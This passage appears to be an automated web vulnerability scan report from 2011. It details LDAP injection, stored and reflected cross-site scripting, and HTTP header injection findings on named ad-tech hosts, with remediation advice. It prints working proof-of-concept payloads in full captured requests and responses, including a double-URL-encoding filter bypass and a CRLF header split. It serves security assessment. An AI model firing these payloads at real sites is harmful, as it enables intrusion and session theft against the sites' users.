HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 13:20:58 GMT Server: Apache-AdvancedExtranetServer/2.0.50 Last-Modified: Wed, 19 Nov 2008 19:51:22 GMT ETag: "2002286b-13-22ec8280;6e79acc0" Accept-Ranges: bytes Content-Length: 19 P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml" Content-Type: application/x-javascript
/* missing file*/;
|
Request 2
GET /adsc/d913132/5/29d3cb5aac4a40a9)!(sn=*/decide.php?ord=1316282753 HTTP/1.1 Host: amch.questionmarket.com Proxy-Connection: keep-alive Referer: http://img.mediaplex.com/content/0/16161/131484/CBD_P3Student_Product_Like_728x90_V1R1.html?mpck=adfarm.mediaplex.com%2Fad%2Fck%2F16161-131484-27909-2%3Fmpt%3D%5B555223779ER%5D&mpjs=amch.questionmarket.com%2Fadscgen%2Fsta.php%3Fsurvey_num%3D913132%26site%3D16161131484279092%26code%3D8029877%26ut_sys%3Dmplx%20cdn.doubleverify.com%2Fscript312.js%3Fagnc%3D936622%26cmp%3D1057913%26crt%3D%26crtname%3D%26adnet%3D%26dvtagver%3D3.3.1346.2176%26adsrv%3D8%26plc%3D16161131484279092%26advid%3D421303%26sid%3D16161131484279092%26adid%3D%20img-cdn.mediaplex.com%2F0%2F16161%2FNielsen_pixel.js%3Fcampid%3D133016%26crid%3D8029877%26plid%3D16161131484279092&mpt=[555223779ER]&mpvc= User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CS1=931683-4-1_200215152932-9-1_600001512117-15-1_909940-17-1_923517-8-1_43741105-3-1; ES=921286-wME{M-0_909615-B67|M-0_925807-p'U|M-0_887846-6K'|M-0_775029-3M.|M-0_924563-#^>|M-0
|
Response 2
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 13:20:59 GMT Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Length: 336 Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /adsc/d913132/5/29d3cb5aac4a40a9)!(sn=*/decide.php was not found on this server.</p> <hr> <address>Apache/2.2.14 (Ubuntu) Server at amch.questionmarket.com Port 80</address> </body></html>
|
2.2. http://ar.voicefive.com/bmx3/broker.pli [pid parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Tentative |
| Host: |
http://ar.voicefive.com |
| Path: |
/bmx3/broker.pli |
Issue detail
The pid parameter appears to be vulnerable to LDAP injection attacks.
The payloads 1dcd98c84e63efb5)(sn=* and 1dcd98c84e63efb5)!(sn=* were each submitted in the pid parameter. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.
Request 1
GET /bmx3/broker.pli?pid=1dcd98c84e63efb5)(sn=*&PRAd=65659550&AR_C=42804711 HTTP/1.1 Host: ar.voicefive.com Proxy-Connection: keep-alive Referer: http://ad.doubleclick.net/adi/N763.MicrosoftMediaNetwork/B5634534.12;sz=728x90;;click=;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00050/107000000000056488.1?!&&PID=8798816&UIT=G-&TargetID=52980966&AN=1376324361&PG=DLSRR1&ASID=d3af6362ac6e4a25944cc785a16bf745&destination=;ord=1376324361? User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ar_p90175839=exp=1&initExp=Thu Sep 1 00:18:01 2011&recExp=Thu Sep 1 00:18:01 2011&prad=3992133314369593&arc=6108751&; ar_p82806590=exp=2&initExp=Sun Sep 4 12:13:34 2011&recExp=Sun Sep 4 12:13:37 2011&prad=67008629&arc=40380915&; ar_p81479006=exp=1&initExp=Sun Sep 4 12:13:57 2011&recExp=Sun Sep 4 12:13:57 2011&prad=58778952&rn=6216791&arc=40380395&; ar_p110620504=exp=1&initExp=Wed Sep 7 12:21:12 2011&recExp=Wed Sep 7 12:21:12 2011&prad=309859439&arc=226794541&; ar_p63514475=exp=1&initExp=Sat Sep 17 00:53:01 2011&recExp=Sat Sep 17 00:53:01 2011&prad=348445181&arc=233006068&; BMX_BR=pid=p109848095&prad=70982068&arc=43901049&exp=1316221073; ar_p109848095=exp=1&initExp=Sat Sep 17 00:57:53 2011&recExp=Sat Sep 17 00:57:53 2011&prad=70982068&arc=43901049&; UID=9cc29993-80.67.74.150-1314836282
|
Response 1
HTTP/1.1 200 OK Server: nginx Date: Sat, 17 Sep 2011 13:09:11 GMT Content-Type: application/x-javascript Connection: close Set-Cookie: ar_1dcd98c84e63efb5)(sn=exp=1&initExp=Sat Sep 17 13:09:11 2011&recExp=Sat Sep 17 13:09:11 2011&prad=65659550&arc=42804711&; expires=Fri 16-Dec-2011 13:09:11 GMT; path=/; domain=.voicefive.com; Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com; P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT" Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 Vary: User-Agent,Accept-Encoding Content-Length: 9
/*error*/ |
Request 2
GET /bmx3/broker.pli?pid=1dcd98c84e63efb5)!(sn=*&PRAd=65659550&AR_C=42804711 HTTP/1.1 Host: ar.voicefive.com Proxy-Connection: keep-alive Referer: http://ad.doubleclick.net/adi/N763.MicrosoftMediaNetwork/B5634534.12;sz=728x90;;click=;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00050/107000000000056488.1?!&&PID=8798816&UIT=G-&TargetID=52980966&AN=1376324361&PG=DLSRR1&ASID=d3af6362ac6e4a25944cc785a16bf745&destination=;ord=1376324361? User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ar_p90175839=exp=1&initExp=Thu Sep 1 00:18:01 2011&recExp=Thu Sep 1 00:18:01 2011&prad=3992133314369593&arc=6108751&; ar_p82806590=exp=2&initExp=Sun Sep 4 12:13:34 2011&recExp=Sun Sep 4 12:13:37 2011&prad=67008629&arc=40380915&; ar_p81479006=exp=1&initExp=Sun Sep 4 12:13:57 2011&recExp=Sun Sep 4 12:13:57 2011&prad=58778952&rn=6216791&arc=40380395&; ar_p110620504=exp=1&initExp=Wed Sep 7 12:21:12 2011&recExp=Wed Sep 7 12:21:12 2011&prad=309859439&arc=226794541&; ar_p63514475=exp=1&initExp=Sat Sep 17 00:53:01 2011&recExp=Sat Sep 17 00:53:01 2011&prad=348445181&arc=233006068&; BMX_BR=pid=p109848095&prad=70982068&arc=43901049&exp=1316221073; ar_p109848095=exp=1&initExp=Sat Sep 17 00:57:53 2011&recExp=Sat Sep 17 00:57:53 2011&prad=70982068&arc=43901049&; UID=9cc29993-80.67.74.150-1314836282
|
Response 2
HTTP/1.1 200 OK Server: nginx Date: Sat, 17 Sep 2011 13:09:11 GMT Content-Type: application/x-javascript Connection: close Set-Cookie: ar_1dcd98c84e63efb5)!(sn=exp=1&initExp=Sat Sep 17 13:09:11 2011&recExp=Sat Sep 17 13:09:11 2011&prad=65659550&arc=42804711&; expires=Fri 16-Dec-2011 13:09:11 GMT; path=/; domain=.voicefive.com; Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com; P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT" Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 Vary: User-Agent,Accept-Encoding Content-Length: 9
/*error*/ |
3. Cross-site scripting (stored)
previous
next
There are 2 instances of this issue:
Issue background
Stored cross-site scripting vulnerabilities arise when data which originated from any tainted source is copied into the application's responses in an unsafe way. An attacker can use the vulnerability to inject malicious JavaScript code into the application, which will execute within the browser of any user who views the relevant application content.
The attacker-supplied code can perform a wide variety of actions, such as stealing victims' session tokens or login credentials, performing arbitrary actions on their behalf, and logging their keystrokes.
Methods for introducing malicious content include any function where request parameters or headers are processed and stored by the application, and any out-of-band channel whereby data can be introduced into the application's processing space (for example, email messages sent over SMTP which are ultimately rendered within a web mail application).
Stored cross-site scripting flaws are typically more serious than reflected vulnerabilities because they do not require a separate delivery mechanism in order to reach target users, and they can potentially be exploited to create web application worms which spread exponentially amongst application users.
Note that automated detection of stored cross-site scripting vulnerabilities cannot reliably determine whether attacks that are persisted within the application can be accessed by any other user, only by authenticated users, or only by the attacker themselves. You should review the functionality in which the vulnerability appears to determine whether the application's behaviour can feasibly be used to compromise other application users.
Issue remediation
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:- Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
- User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
3.1. http://ar.voicefive.com/bmx3/broker.pli [n parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://ar.voicefive.com |
| Path: |
/bmx3/broker.pli |
Issue detail
The value of the n request parameter submitted to the URL /b/wc_beacon.pli is copied into the HTML document as plain text between tags at the URL /bmx3/broker.pli. The payload d6afa<script>alert(1)</script>1780c77d05c was submitted in the n parameter. This input was returned unmodified in a subsequent request for the URL /bmx3/broker.pli.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request 1
GET /b/wc_beacon.pli?n=d6afa<script>alert(1)</script>1780c77d05c&d=0&v=method-%3E-1,ts-%3E1316264640.321,wait-%3E10000,&1316282687360 HTTP/1.1 Host: ar.voicefive.com Proxy-Connection: keep-alive Referer: http://ad.doubleclick.net/adi/N763.MicrosoftMediaNetwork/B5634534.12;sz=728x90;;click=;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00050/107000000000056488.1?!&&PID=8798816&UIT=G-&TargetID=52980966&AN=1376324361&PG=DLSRR1&ASID=d3af6362ac6e4a25944cc785a16bf745&destination=;ord=1376324361? User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ar_p90175839=exp=1&initExp=Thu Sep 1 00:18:01 2011&recExp=Thu Sep 1 00:18:01 2011&prad=3992133314369593&arc=6108751&; ar_p82806590=exp=2&initExp=Sun Sep 4 12:13:34 2011&recExp=Sun Sep 4 12:13:37 2011&prad=67008629&arc=40380915&; ar_p81479006=exp=1&initExp=Sun Sep 4 12:13:57 2011&recExp=Sun Sep 4 12:13:57 2011&prad=58778952&rn=6216791&arc=40380395&; ar_p110620504=exp=1&initExp=Wed Sep 7 12:21:12 2011&recExp=Wed Sep 7 12:21:12 2011&prad=309859439&arc=226794541&; ar_p63514475=exp=1&initExp=Sat Sep 17 00:53:01 2011&recExp=Sat Sep 17 00:53:01 2011&prad=348445181&arc=233006068&; BMX_BR=pid=p109848095&prad=70982068&arc=43901049&exp=1316221073; ar_p109848095=exp=1&initExp=Sat Sep 17 00:57:53 2011&recExp=Sat Sep 17 00:57:53 2011&prad=70982068&arc=43901049&; ar_p108883753=exp=1&initExp=Sat Sep 17 13:03:59 2011&recExp=Sat Sep 17 13:03:59 2011&prad=65659550&arc=42804711&; BMX_G=method->-1,ts->1316264639; BMX_3PC=1; UID=9cc29993-80.67.74.150-1314836282
|
Request 2
GET /bmx3/broker.pli?pid=p108883753&PRAd=65659550&AR_C=42804470 HTTP/1.1 Host: ar.voicefive.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://ad.doubleclick.net/adi/N763.MicrosoftMediaNetwork/B5634534.12;sz=728x90;;click=;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00050/107000000000056488.1?!&&PID=8798816&UIT=A-&TargetID=52980966&AN=2048918403&PG=DLSRD1&ASID=d09c46b378244924a80762d176989e26&destination=;ord=2048918403? Cookie: ar_p97174789=exp=1&initExp=Mon Aug 8 01:43:12 2011&recExp=Mon Aug 8 01:43:12 2011&prad=314453501&arc=210323079&; UID=187a66e5-80.67.74.153-1312767792; ar_p91143664=exp=24&initExp=Wed Aug 17 18:11:34 2011&recExp=Wed Aug 17 18:13:16 2011&468db16b9200b4026215b7a4=1&prad=309847789&arc=218676900&; ar_p107223597=exp=1&initExp=Thu Sep 1 03:23:36 2011&recExp=Thu Sep 1 03:23:36 2011&prad=74127&arc=452367&; ar_p82806590=exp=1&initExp=Sun Sep 4 14:46:33 2011&recExp=Sun Sep 4 14:46:33 2011&prad=58779256&arc=43578905&; ar_p91136705=exp=1&initExp=Sun Sep 11 12:27:33 2011&recExp=Sun Sep 11 12:27:33 2011&prad=309650252&arc=206710286&
|
Response 2
HTTP/1.1 200 OK Server: nginx Date: Sat, 17 Sep 2011 14:43:07 GMT Content-Type: application/x-javascript Connection: close Set-Cookie: ar_p108883753=exp=30&initExp=Sat Sep 17 14:34:51 2011&recExp=Sat Sep 17 14:43:07 2011&89dd48247dd5113d6472e752=1&prad=65659550&arc=42804470&; expires=Fri 16-Dec-2011 14:43:07 GMT; path=/; domain=.voicefive.com; Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com; P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT" Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 Vary: User-Agent,Accept-Encoding Content-Length: 31988
if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"65659550",Pid:"p108883753",Arc:"42804470",Location:C ...[SNIP]... 'exp=1&initExp=Sat Sep 17 00:57:53 2011&recExp=Sat Sep 17 00:57:53 2011&prad=70982068&arc=43901049&', "89dd48246a33298449bdf87": 'method%2D%3E%2D1%2Cts%2D%3E1316267468%2E354%2Cwait%2D%3E10000%2C', "d6afa<script>alert(1)</script>1780c77d05c": 'method%2D%3E%2D1%2Cts%2D%3E1316264640%2E321%2Cwait%2D%3E10000%2C', "ar_p10888375389dd48245b5da2b0ae9edcea": 'exp=1&initExp=Sat Sep 17 14:04:38 2011&recExp=Sat Sep 17 14:04:38 2011&prad=65659550&ar ...[SNIP]...
|
3.2. http://ar.voicefive.com/bmx3/broker.pli [pid parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://ar.voicefive.com |
| Path: |
/bmx3/broker.pli |
Issue detail
The value of the pid request parameter submitted to the URL /bmx3/broker.pli is copied into the HTML document as plain text between tags at the URL /bmx3/broker.pli. The payload 711dd%253cscript%253ealert%25281%2529%253c%252fscript%253e92750d4dc16 was submitted in the pid parameter. This input was returned as 711dd<script>alert(1)</script>92750d4dc16 in a subsequent request for the URL /bmx3/broker.pli.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the pid request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /bmx3/broker.pli?pid=711dd%253cscript%253ealert%25281%2529%253c%252fscript%253e92750d4dc16&PRAd=65659550&AR_C=42804711 HTTP/1.1 Host: ar.voicefive.com Proxy-Connection: keep-alive Referer: http://ad.doubleclick.net/adi/N763.MicrosoftMediaNetwork/B5634534.12;sz=728x90;;click=;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00050/107000000000056488.1?!&&PID=8798816&UIT=G-&TargetID=52980966&AN=1376324361&PG=DLSRR1&ASID=d3af6362ac6e4a25944cc785a16bf745&destination=;ord=1376324361? User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ar_p90175839=exp=1&initExp=Thu Sep 1 00:18:01 2011&recExp=Thu Sep 1 00:18:01 2011&prad=3992133314369593&arc=6108751&; ar_p82806590=exp=2&initExp=Sun Sep 4 12:13:34 2011&recExp=Sun Sep 4 12:13:37 2011&prad=67008629&arc=40380915&; ar_p81479006=exp=1&initExp=Sun Sep 4 12:13:57 2011&recExp=Sun Sep 4 12:13:57 2011&prad=58778952&rn=6216791&arc=40380395&; ar_p110620504=exp=1&initExp=Wed Sep 7 12:21:12 2011&recExp=Wed Sep 7 12:21:12 2011&prad=309859439&arc=226794541&; ar_p63514475=exp=1&initExp=Sat Sep 17 00:53:01 2011&recExp=Sat Sep 17 00:53:01 2011&prad=348445181&arc=233006068&; BMX_BR=pid=p109848095&prad=70982068&arc=43901049&exp=1316221073; ar_p109848095=exp=1&initExp=Sat Sep 17 00:57:53 2011&recExp=Sat Sep 17 00:57:53 2011&prad=70982068&arc=43901049&; UID=9cc29993-80.67.74.150-1314836282
|
Request 2
GET /bmx3/broker.pli?pid=p108883753&PRAd=65659550&AR_C=42804470 HTTP/1.1 Host: ar.voicefive.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://ad.doubleclick.net/adi/N763.MicrosoftMediaNetwork/B5634534.12;sz=728x90;;click=;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00050/107000000000056488.1?!&&PID=8798816&UIT=A-&TargetID=52980966&AN=2048918403&PG=DLSRD1&ASID=d09c46b378244924a80762d176989e26&destination=;ord=2048918403? Cookie: ar_p97174789=exp=1&initExp=Mon Aug 8 01:43:12 2011&recExp=Mon Aug 8 01:43:12 2011&prad=314453501&arc=210323079&; UID=187a66e5-80.67.74.153-1312767792; ar_p91143664=exp=24&initExp=Wed Aug 17 18:11:34 2011&recExp=Wed Aug 17 18:13:16 2011&468db16b9200b4026215b7a4=1&prad=309847789&arc=218676900&; ar_p107223597=exp=1&initExp=Thu Sep 1 03:23:36 2011&recExp=Thu Sep 1 03:23:36 2011&prad=74127&arc=452367&; ar_p82806590=exp=1&initExp=Sun Sep 4 14:46:33 2011&recExp=Sun Sep 4 14:46:33 2011&prad=58779256&arc=43578905&; ar_p91136705=exp=1&initExp=Sun Sep 11 12:27:33 2011&recExp=Sun Sep 11 12:27:33 2011&prad=309650252&arc=206710286&
|
Response 2
HTTP/1.1 200 OK Server: nginx Date: Sat, 17 Sep 2011 14:43:06 GMT Content-Type: application/x-javascript Connection: close Set-Cookie: ar_p108883753=exp=28&initExp=Sat Sep 17 14:34:51 2011&recExp=Sat Sep 17 14:43:06 2011&89dd48247dd5113d6472e752=1&prad=65659550&arc=42804470&; expires=Fri 16-Dec-2011 14:43:06 GMT; path=/; domain=.voicefive.com; Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com; P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT" Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 Vary: User-Agent,Accept-Encoding Content-Length: 31783
if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"65659550",Pid:"p108883753",Arc:"42804470",Location:C ...[SNIP]... =Sat Sep 17 14:42:57 2011&recExp=Sat Sep 17 14:42:57 2011&prad=65659550&arc=42804470&', ">": 'exp=1&initExp=Sat Sep 17 13:09:12 2011&recExp=Sat Sep 17 13:09:12 2011&prad=65659550&arc=42804711&', "ar_711dd<script>alert(1)</script>92750d4dc16": 'exp=1&initExp=Sat Sep 17 14:43:05 2011&recExp=Sat Sep 17 14:43:05 2011&prad=65659550&arc=42804711&', "BMX_3PC": '1', "sn": 'exp=5&initExp=Sat Sep 17 13:09:11 2011&recExp=Sat Sep 17 13:09:12 2011& ...[SNIP]...
|
4. HTTP header injection
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://bidder.mathtag.com |
| Path: |
/notify |
Issue detail
The value of the exch request parameter is copied into the x-mm-debug response header. The payload e455a%0d%0acb0dcbe7dc2 was submitted in the exch parameter. This caused a response containing an injected HTTP header.
Issue background
HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.
Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.
Issue remediation
If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.
Request
GET /notify?exch=e455a%0d%0acb0dcbe7dc2&id=5aW95q2jLzEvTUEvTkdVM05EbGpOakV0TlRrd1l5MDBNV0l4TFdGaFpEWXRPRGd5WTJKaE9XVmpaakV5LzgxMDc2NjMyOTYwODUyMzI2LzExMjUxMS8xMDc2MzYvMTMvX2ZrTzhjMkc0aHVUREhNaTB2REd4dDlyNU54aUdGUnpISS1paDVLZ3hWSS8/96ahSeC6UElq8Sq4YzZpyNAZwdk HTTP/1.1 Host: bidder.mathtag.com Proxy-Connection: keep-alive Referer: http://m.adnxs.com/tt?member=280&inv_code=CP49CG&cb=19091 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ts=1315103290; optout=1
|
Response
HTTP/1.1 404 Not found Date: Sat, 17 Sep 2011 13:29:27 GMT Server: MMBD/3.5.15.3 Content-Type: text/html; charset=utf-8 Content-Length: 18 x-mm-debug: exchange not found - e455a cb0dcbe7dc2 x-mm-host: pao-bidder-x7 Connection: keep-alive
Request not found
|
5. Cross-site scripting (reflected)
previous
next
There are 85 instances of this issue:
Issue background
Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Remediation background
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:- Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
- User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
5.1. http://amch.questionmarket.com/adscgen/d_layer.php [lang parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://amch.questionmarket.com |
| Path: |
/adscgen/d_layer.php |
Issue detail
The value of the lang request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ca299'%3balert(1)//1e976715b28 was submitted in the lang parameter. This input was echoed as ca299';alert(1)//1e976715b28 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adscgen/d_layer.php?sub=amch&type=d_layer&survey_num=913131&site=10&code=922738&p=1&protocol=http&lang=ca299'%3balert(1)//1e976715b28&auto_ctl_invite=0&noiframe=1&loc=aHR0cDovL3d3dy5kZWxpc2guY29tL3NlYXJjaC9mYXN0X3NlYXJjaF9yZWNpcGVzP3NlYXJjaF90ZXJtPXhzcytzdWdhcitjYWtlJg== HTTP/1.1 Host: amch.questionmarket.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.delish.com/search/fast_search_recipes?search_term=xss+sugar+cake& Cookie: ES=917157-$MM\M-0_845473-t`m\M-0_908257-~|k^M-f#4_922317-|N'|M-g1_917547-Q#?|M-0_924563-`#?|M-0_913131-y'?|M-0; linkjumptest=1; endsurvey=no; CS1=43208740-5-1_845473-1-1_912463-21-4_911763-21-5_912550-21-1_912461-21-2_912465-21-1_43977402-2-2_43064321-10-1_43741102-3-1_400008095899-10-1; LP=1316270041
|
Response
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 14:40:46 GMT Server: Apache/2.2.3 X-Powered-By: PHP/4.4.4 Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache, must-revalidate Pragma: no-cache P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml" DL_S: b201.dl Content-Type: text/html Content-Length: 13935
var DL_HideSelects = true; var DL_HideObjects = false; var DL_HideIframes = false; var DL_Banner; // Will be bound to the DIV element representing the layer var DL_ScrollState = 0; var DL_width; var D ...[SNIP]... DL_SurveyClickthru = 1; } DL_Close(false);
window.top.location.href='http://amch.questionmarket.com/surveyf/?survey_server=survey.questionmarket.com&survey_num=913131&site=10&code=922738&lang=ca299';alert(1)//1e976715b28&frame=&dl_logo=&invite=no&link='+escape(window.location.href)+'&orig='+escape(window.location.href); }
function DL_Close(adscout) { if (typeof adscout == 'undefined' || adscout == true) { DL_Adsco ...[SNIP]...
|
5.2. http://amch.questionmarket.com/adscgen/dynamiclink.js.php [auto_ctl_invite parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://amch.questionmarket.com |
| Path: |
